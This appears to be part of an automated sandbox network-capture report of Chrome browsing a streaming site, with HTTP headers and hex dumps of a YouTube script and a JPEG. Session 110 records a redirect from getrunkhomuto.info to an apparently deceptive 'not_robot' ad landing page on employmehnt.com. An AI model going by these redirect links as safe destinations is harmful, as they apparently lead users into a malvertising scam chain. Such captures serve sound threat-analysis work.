                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: d2 0a fe f6 12 37 53 b1 52 bb 2c 45 9d c7 af 48 fb c0 31 dc 2f db f2 8e 64 d8 36 3b ed 59 e3 4d 76 c6 7f 19 49 14 ac 95 df c9 1f 8c 9f 6c 80 2a 28 09 3f 57 2c 12 c1 59 4c 99 35 c9 2c 11 da 0e 3f 7f b3 24 cb 12 e8 ad ed fa c6 b8 8a 00 54 90 3a 03 85 7d 62 2f 57 39 bc 9a b0 99 42 99 23 58 27 ea cd 60 12 4a bc a5 53 db a8 31 95 ca bc 90 4f d2 6f 30 6f b8 6c f6 72 1a 55 d1 df f8 a8 80 6e 56 fe 74 77 f4 26 85 c6 c8 68 41 d0 74 07 d8 47 01 46 35 90 06 35 d2 03 4a 7f 96 5e fd 0c 57 fc 9d 41 b4 7f da e7 21 d3 8e cd 61 8a 7d 2b 1f 60 b3 14 93 3b b0 20 e4 76 48 27 26 60 c0 66 f0 5a 93 c7 e2 48 78 a3 f6 cb 45 80 c3 12 ae cb 41 32 92 1a 46 b6 81 77 92 4f e4 f4 8c ce 35 19 92 59 43 77 c3 ca c8 34 10 bf 9d 7c 99 0c 7f a2 e5 91 fa b8 2a 9f 47 1e 00 d3 75 16 3d 80 55 50
                                                                                                                                                                                          Data Ascii: 7SR,EH1/d6;YMvIl*(?W,YL5,?$T:}b/W9B#X'`JS1Oo0olrUnVtw&hAtGF55J^WA!a}+`; vH'&`fZHxEA2FwO5YCw4|*Gu=UP
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 63 2d 85 ec 37 e3 03 17 db a8 cb 8e 7f d2 b8 0f d6 35 55 58 d1 c1 1f ae f0 dc 96 2d 22 76 39 dc 83 ea 0b d2 86 0a 7a e0 19 d0 60 41 9d 46 75 18 54 6b 3f ff c4 00 29 11 00 02 02 02 01 04 01 04 03 01 01 01 00 00 00 00 01 02 00 03 04 11 12 05 13 21 31 22 06 10 14 41 15 23 32 51 42 52 ff da 00 08 01 03 01 01 08 00 27 cf db 94 e7 3b 9a 82 ef 33 9f eb ed df 5d e8 f7 d7 7a 9d e4 30 5c b1 ae 40 74 4b 85 1b 22 d5 22 1b 54 7b 36 a0 f1 39 ea 02 49 84 cd c2 d3 70 5c 0b 71 1a 9b fb 1a b6 c6 0c 66 3e 17 f1 bc ee 0c 68 d5 f9 1c 8a 06 5d 0e c1 f7 3b 27 dc 38 fb 7e 70 88 21 b3 7e 89 fd 97 c8 0b ad 1b 34 43 46 d6 c1 af 7e 36 45 a0 bf 09 4b 56 ac 4d 97 d5 65 9b ba 93 d1 0a 92 83 23 13 b0 51 0b 62 5e 58 f6 8e 19 ed 72 b2 9c 75 7f f4 4e 86 ca d5 cf 97 15 c7 e4 ae 57 b5 a0 01
                                                                                                                                                                                          Data Ascii: c-75UX-"v9z`AFuTk?)!1"A#2QBR';3]z0\@tK""T{69Ip\qf>h];'8~p!~4CF~6EKVMe#Qb^XruNW
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 0c 5d a9 75 06 a7 e3 15 ff 00 47 0e f4 0c 56 73 81 be c8 fa a8 ce f3 a1 da 94 0e 4d 95 1b 01 08 60 af c4 33 73 86 dc 18 b6 6c 01 19 f6 d3 5f 63 33 97 ca 18 29 78 b4 be e2 65 7c 34 6a d7 1d 95 c7 b1 86 c2 d1 6d 64 c6 bc 6c c5 7d 90 ca 6e 46 1f d8 6e 72 35 58 24 9d 1f 5e d0 03 17 d0 96 a6 b4 7e db 84 c7 a5 2c 1a 7b 31 ff 00 f6 9c 62 e2 b8 23 90 d6 a3 1d ac 3b 53 a9 76 22 5d e6 1c 3b a9 3b 53 91 a2 01 5b 46 b6 49 f0 19 ef cc c6 00 ad 68 ee 58 05 e4 29 4d 1e e1 62 4b 13 f6 2e 04 00 98 43 01 f0 ec 86 68 2b f1 c6 0f f8 7b 7e 84 b6 af 80 33 f6 44 5b 83 ee 65 5f 5d 80 2a 77 05 6a 19 9a d7 b4 c5 c1 27 fd 26 38 42 0a 77 dc 7f a2 4b 36 c1 33 b8 21 2d 55 bc 82 e7 56 e7 cd 9d 43 ce ab 5b 1d 1c 38 d7 20 18 58 f5 7a 2d 49 f1 1e 96 08 01 1d 5e 9a 95 9c bd af 6b 16 35 f1
                                                                                                                                                                                          Data Ascii: ]uGVsM`3sl_c3)xe|4jmdl}nFnr5X$^~,{1b#;Sv"];;S[FIhX)MbK.Ch+{~3D[e_]*wj'&8BwK63!-UVC[8 Xz-I^k5


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          109192.168.2.1649844142.250.181.784436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:13 UTC613OUTGET /iframe_api HTTP/1.1
                                                                                                                                                                                          Host: www.youtube.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC2191INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Expires: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube_main"
                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script'
                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                          Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                                                                          Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                          Set-Cookie: YSC=1K_n3-vIF0w; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Set-Cookie: VISITOR_INFO1_LIVE=JvrfUCtMilg; Domain=.youtube.com; Expires=Fri, 13-Jun-2025 11:38:14 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGA%3D%3D; Domain=.youtube.com; Expires=Fri, 13-Jun-2025 11:38:14 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                          Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version,Accept-Encoding
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1000INData Raw: 33 65 31 0d 0a 76 61 72 20 73 63 72 69 70 74 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 5c 2f 73 5c 2f 70 6c 61 79 65 72 5c 2f 66 38 66 35 33 65 31 61 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 76 66 6c 73 65 74 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 6a 73 27 3b 74 72 79 7b 76 61 72 20 74 74 50 6f 6c 69 63 79 3d 77 69 6e 64 6f 77 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 79 6f 75 74 75 62 65 2d 77 69 64 67 65 74 2d 61 70 69 22 2c 7b 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 78 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 73 63 72 69 70 74 55 72 6c 3d 74 74 50 6f 6c 69 63 79 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52
                                                                                                                                                                                          Data Ascii: 3e1var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/f8f53e1a\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptUR
                                                                                                                                                                                          2024-12-15 11:38:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          110192.168.2.1649846108.158.75.1254436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1324OUTGET /WDQzUDF3C1AjDAxsaQFVDWYKAgMWd1cYQRBVZgIDPXEKO2M2cRUxUywJB3ZDPVAOYRcrWQ5hB35fDidQLFdbdQNoV18xQitdUHUDaEdGMkUxQF81Qn0GAz9fNF1dNRRqBFUiVD0RAWBGMUBbdQNoWVwmWD1HFSYMaRoAZB9rAh1kFytAQG0BfkRBPgxoElY9U2UEFSRYPAkCYAhqBgRoFypMSm0AagwDDwBoBgd2WDZXDn0AflJAbQB+RlY2DDBARyBCfQdydQMeEQEWVytcUiJULEIdM159BnV2VStAX21ZLEBDIxRrdRZid30GdTZCMFVBNUUuGlA/FGpyXj9HMVEWYnc7VUAxUzRVXTNQdVFDOUI3UFZ9AHVAR2ABawAGaAJ+XkAkDGgSVj5DZQQVPFItVQ49XiJdXzxQfQZ1ZR9oEQFgGS9dXTReL0cWYgE2QBZiAWkEHWAUa3YWYgEvXV1mBX0HcXUDaEwFZBh9BgMxQShYVidUOl9aJBRqcgZjBnYHBXUDaBxYOEU1WBZicn0GAzxYM1EWYgE/UVA7XnERAWBSMEZcPVR9BnVhAG8aA34BdgQWYgErVVUxQzERARYEawMdYwd+QEk0DHUBFSVdN1cOdlg+CQN2UiwJBnZSLFcOYQ HTTP/1.1
                                                                                                                                                                                          Host: getrunkhomuto.info
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1360INHTTP/1.1 302 Found
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:15 GMT
                                                                                                                                                                                          Accept-CH: DPR, Width, Viewport-Width, Device-Memory, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List
                                                                                                                                                                                          Set-Cookie: AWSALB=rmkwOR43HXje/6Bpdzgc6vHnoIR5wxjug/lfooeGUb0BqRy7nyyXahBKv5lVx29dIYGIEQhtxaNCFWX+k1uW54CYq+9QW9/YTRp68rnRC3yYAD7iMyb413LiKm4U; Expires=Sun, 22 Dec 2024 11:38:14 GMT; Path=/
                                                                                                                                                                                          Set-Cookie: AWSALBCORS=rmkwOR43HXje/6Bpdzgc6vHnoIR5wxjug/lfooeGUb0BqRy7nyyXahBKv5lVx29dIYGIEQhtxaNCFWX+k1uW54CYq+9QW9/YTRp68rnRC3yYAD7iMyb413LiKm4U; Expires=Sun, 22 Dec 2024 11:38:14 GMT; Path=/; SameSite=None
                                                                                                                                                                                          set-cookie: csu=8dbdac19-33de-4295-8d02-4ac9205c776a
                                                                                                                                                                                          Server: openresty/1.17.8.2
                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, no-transform
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          P3P: CP="NID DSP ALL COR"
                                                                                                                                                                                          Location: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=US
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 fc56b8a676000a5893378ee9d2b55f78.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                                                          X-Amz-Cf-Id: G884FpngRurFjtKWxSrgYEBrcuxWyIYclNW_Xk7pnJY9Wq0ydtDvig==


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          111192.168.2.1649847151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC676OUTGET /images/M/MV5BNzkyYjk2MGMtNjdlYS00M2Y5LThiNmMtNDQxYTk2MTUyNmMwXkEyXkFqcGdeQXVyOTg4MDk3MTQ@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 38902
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 2aaf368f-2539-48c5-b315-a18b22f28eff
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 15 Jan 2020 21:51:42 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 25 Nov 2044 17:09:30 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 940182
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000062-IAD, cache-ewr-kewr1740029-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bb 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 00 02 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 cf e9 7e 8d 11 75 6e 51 7a 5f a3 82
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5~unQz_
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 8c c8 ab db e0 fe b9 5f eb 46 c5 94 b0 33 f8 cf 4f 8a 34 98 33 9f ac c7 e4 ef 59 79 92 64 39 a5 e4 3a 1e f5 b6 64 0f 41 37 e4 f4 18 ef 90 f2 34 79 fc f9 c4 7e ee 36 90 35 19 f0 ec 89 23 60 f3 be 7b dd 1a e2 b2 e5 1c 19 fa b0 a5 0d bb 1c d6 5d 85 f4 01 ac 48 aa 4d 9b 02 d1 aa 75 a8 32 f6 0a 04 27 3e 1f d1 bd 4c 92 49 de af 3c 00 72 23 ba 9c f9 7e 59 82 f0 c4 70 74 ab da 6f c3 4a f8 df 6d e8 0f 39 dd 88 b1 73 67 c3 38 e8 f0 b5 6f cb 2c bb 94 40 ab 6a 2a 6e 06 ef 29 1b e5 ad 5b 09 bf c0 db b3 65 11 5c 5b 4b 24 39 24 31 1a 2c 79 54 77 cb a8 b1 e1 7b 03 50 d9 f9 3e ce 6d 01 22 72 01 ab 18 22 bb a6 7c 97 d8 3e b1 36 ff 00 3d 69 5d b7 3e d3 be e5 12 83 f6 a2 4a d6 ea 36 5d ee a5 f5 94 a2 55 ed 79 3f 7f 05 42 81 cd 68 e9 08 7e a4 67 1b 1c 72 6c f3 24 cd e8 ac f2
                                                                                                                                                                                          Data Ascii: _F3O43Yyd9:dA74y~65#`{]HMu2'>LI<r#~YptoJm9sg8o,@j*n)[e\[K$9$1,yTw{P>m"r"|>6=i]>J6]Uy?Bh~grl$
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 9a f3 9b 92 a2 a3 32 b0 3c 16 70 46 30 d4 c3 af 89 c5 06 15 e2 29 12 a9 74 ce ae 7e 17 21 ba d6 56 e4 2d 61 41 84 c8 2f 8e 90 42 df ab a7 c8 f9 91 99 77 a5 f3 90 9b 0e 48 0f 5d c4 59 b4 4f 8b bf 8b 84 9c 33 b9 64 d1 bf 20 76 43 3c 2b dd 19 62 f8 9e 8c 73 91 2f e4 85 87 7e fc 4b a2 ac e5 e8 54 9b 66 9c 12 aa 67 29 88 aa 7e d7 06 11 4a 66 5e b0 7a 14 b1 f2 c1 e6 82 af 72 58 60 57 ec c6 6e d5 ff 00 48 d4 b1 57 a0 4f 01 fd f8 4a dd 49 5c 00 ff 00 1b 05 d6 07 9a 38 20 21 d0 ee 2c 0a fd 15 1c 86 7a 07 dc 26 fa 5d ec c6 2f cb 5c 08 ca 51 23 ec 9a 07 dc e7 a9 34 b9 f2 ee 0c d4 7b ca 7e 49 a0 40 8f f0 c7 7f c9 1f 64 76 e9 1f f4 8f 9d 21 fe 91 fb ea 1f e9 1f 38 54 fd 23 6f 09 7d 48 d7 22 eb 00 9f ff c4 00 33 10 00 02 02 02 01 03 03 03 04 02 01 04 02 03 00 00 01 02
                                                                                                                                                                                          Data Ascii: 2<pF0)t~!V-aA/BwH]YO3d vC<+bs/~KTfg)~Jf^zrX`WnHWOJI\8 !,z&]/\Q#4{~I@dv!8T#o}H"3
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 8d e4 77 f1 af 7e 26 6b d9 d4 f6 d2 fc bf 89 19 3a 3c 99 9a fd f9 16 a9 f1 df 45 5b 12 c7 45 3a a2 fa ef fb 78 89 c4 4e 22 71 99 e7 4a 16 24 c8 f3 31 2c e9 d8 a4 f0 85 40 f3 98 9f c1 74 ae 7f e3 97 f9 82 7e 04 53 c5 d4 cb 18 d8 dc 99 7c 09 b9 b8 3d b0 73 86 3f c4 f2 df 79 60 94 a0 f3 39 ff 00 ad ee 15 58 c8 14 4f 0b a5 be e2 ed a2 d2 c5 dc c1 c8 ff 00 c4 db ee 1d 72 0f 42 c0 e9 46 78 7e d6 7b db 6e ac 73 3e b6 5b 6f 2f 6f 4d 6d d2 27 aa 58 51 f1 a6 7f f8 2f 95 cf e8 04 c8 fb a0 fc 4f c4 af fc 89 3d 52 9d 05 75 c1 63 42 b5 86 c7 36 31 63 04 58 0c f4 a7 fb d2 32 c5 3a 9b f6 cc f5 77 6f 8d 5e 91 4f 22 6e 62 63 36 99 a0 6d c2 bb 8f 5f fa e7 f2 d4 3c 50 a8 6f a7 16 8d 1a ed bf 14 f0 98 f7 8b d7 90 c9 b3 a4 84 c4 11 94 47 f6 f4 bb b8 5b c6 7a 9e 6a 5d 68 59 7d
                                                                                                                                                                                          Data Ascii: w~&k:<E[E:xN"qJ$1,@t~S|=s?y`9XOrBFx~{ns>[o/oMm'XQ/O=RucB61cX2:wo^O"nbc6m_<PoG[zj]hY}
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: cf a3 68 30 1c cf d3 1e 7e 94 f3 d4 31 0d 0e a0 f5 5a 75 1a 75 0c c1 ff 00 1f 7b 6c fe 70 26 18 e2 4b 4c 8c 63 77 ca bc 4f 93 54 63 3a eb 73 30 1b 6b 3a c1 a7 a2 1e 3f c8 c7 7f 88 59 61 96 7e 00 fe b0 46 9f 88 bd d1 a7 e4 9f 63 f1 8c 3e 30 d4 cc 14 26 29 28 a1 0e 43 06 06 53 60 a0 f6 ab 27 ac 35 0f 7e d2 eb 39 31 d7 36 9d 46 9d 56 9d 67 13 ea 6d 13 eb 6e 97 5c f6 1d b7 b7 4f 90 d4 c6 21 10 4a 58 b5 bb 35 d7 f0 8a 78 c5 a1 37 b9 d4 55 f8 c2 fd 4e 21 9d b8 f6 8b de 58 da f1 66 25 ca 36 28 cf b2 82 79 64 ea c5 16 08 d0 78 9c f8 ec 7b 6c 09 ff 00 ec 4f ff 00 74 5b c1 eb 8a 7f 13 36 a1 a2 2b a3 1f 91 28 71 d0 d7 cc 36 45 bc 17 b0 9a dc e1 bf 1d 39 55 7c fc 74 84 d6 8c b3 cf b5 69 b9 5a 77 12 f7 ff 00 c6 2b a3 ab d9 3f 96 bf bc c5 3f 88 f6 9a e5 1d 98 93 92 e7
                                                                                                                                                                                          Data Ascii: h0~1Zuu{lp&KLcwOTc:s0k:?Ya~Fc>0&)(CS`'5~916FVgmn\O!JX5x7UN!Xf%6(ydx{lOt[6+(q6E9U|tiZw+??
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 15 cc dc 35 a9 11 0b 28 e2 7f 66 4f 91 16 1f 61 ec 7d 81 9e 21 ef 09 d4 aa be 67 51 eb 29 e6 25 5d b9 36 bf 3f b3 73 73 c4 1d e3 09 cf dc 1f 6f 12 8a 45 83 62 eb ac 04 a8 00 fe cd cc 8f 22 0f dc 98 bd 40 a4 0c 60 ac 15 9a ae 0d c4 b6 23 2b f1 1d 3a 87 66 c7 1f 31 33 93 55 13 31 e9 d8 ea 59 6d c6 c3 3d 30 73 de ed fe 1b 42 8c 9c 10 fd d4 82 a4 83 88 a2 c5 65 38 d8 e6 e8 ee 89 d9 16 eb 5b c1 b3 94 a6 be a4 2a b2 ca 5a be f1 2b f8 f3 26 8a eb 3a 6b e8 e0 01 1e 9b d9 66 53 7c da 0f 72 7d b2 3c 88 3f 60 f6 c0 ff 00 20 13 c6 4c cd 74 16 08 6d 5e 7c 4b d6 fe 25 1a 16 8e 39 85 7a 7f 2b 2a 4c 94 d4 b2 b6 a4 e8 fa 4b 7d f3 34 ff 00 c8 aa 5b 93 d2 b8 4b a8 4c 81 b1 8f 8c 69 0e 5b 0d 39 53 a0 d8 ce bd a5 38 96 92 26 7d 1d 3d 19 6b ad 0a a8 09 5e 8c 39 7c 2d 65 39 5c
                                                                                                                                                                                          Data Ascii: 5(fOa}!gQ)%]6?ssoEb"@`#+:f13U1Ym=0sBe8[*Z+&:kfS|r}<?` Ltm^|K%9z+*LK}4[KLi[9S8&}=k^9|-e9\
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 10 22 31 41 14 32 06 15 20 23 42 16 51 71 ff da 00 08 01 02 01 01 08 00 d4 26 00 49 d0 4c 1b 59 80 22 9a c0 d0 ed 24 ed 24 ed a4 ed a4 ed a4 ed a4 ed a4 ed ac e0 b2 ec 55 b2 b2 b0 e3 ba 92 a4 ee 03 b9 c6 33 68 6e 25 45 88 51 56 32 54 34 37 1e a2 4e c0 67 4f dd 56 cd 6c 72 b0 78 85 6d d7 9d 5a a2 0b 58 3f 12 12 dd f2 81 2d 00 09 c6 dd ee 28 70 7d cf 8f b3 cd 5f 19 6c 58 c0 88 0e fc c2 7c 89 88 9b b0 b4 dc dc dc 7b b7 b5 66 b6 95 f7 0e f5 27 65 c3 d4 c6 7b 38 ee 1b 2b 24 96 2f 40 04 91 91 59 31 72 2b 51 a5 ef 39 9c d9 aa f0 84 7f cd cb ab 4c 53 f5 3e c4 c2 ff 00 a3 e8 4e 81 23 89 73 b7 5f 67 c5 a5 1b de 10 a9 58 1b 5e 42 dc c4 f9 7e 4d 69 0c cd 59 4e 2c 2d 1e 40 e7 3b ea bb 26 bb dd 96 10 a4 ec df fb 08 a7 c9 9f 73 13 f5 68 f9 21 21 cb 78 33 b6 00 23 22 77
                                                                                                                                                                                          Data Ascii: "1A2 #BQq&ILY"$$U3hn%EQV2T47NgOVlrxmZX?-(p}_lX|{f'e{8+$/@Y1r+Q9LS>N#s_gX^B~MiYN,-@;&sh!!x3#"w
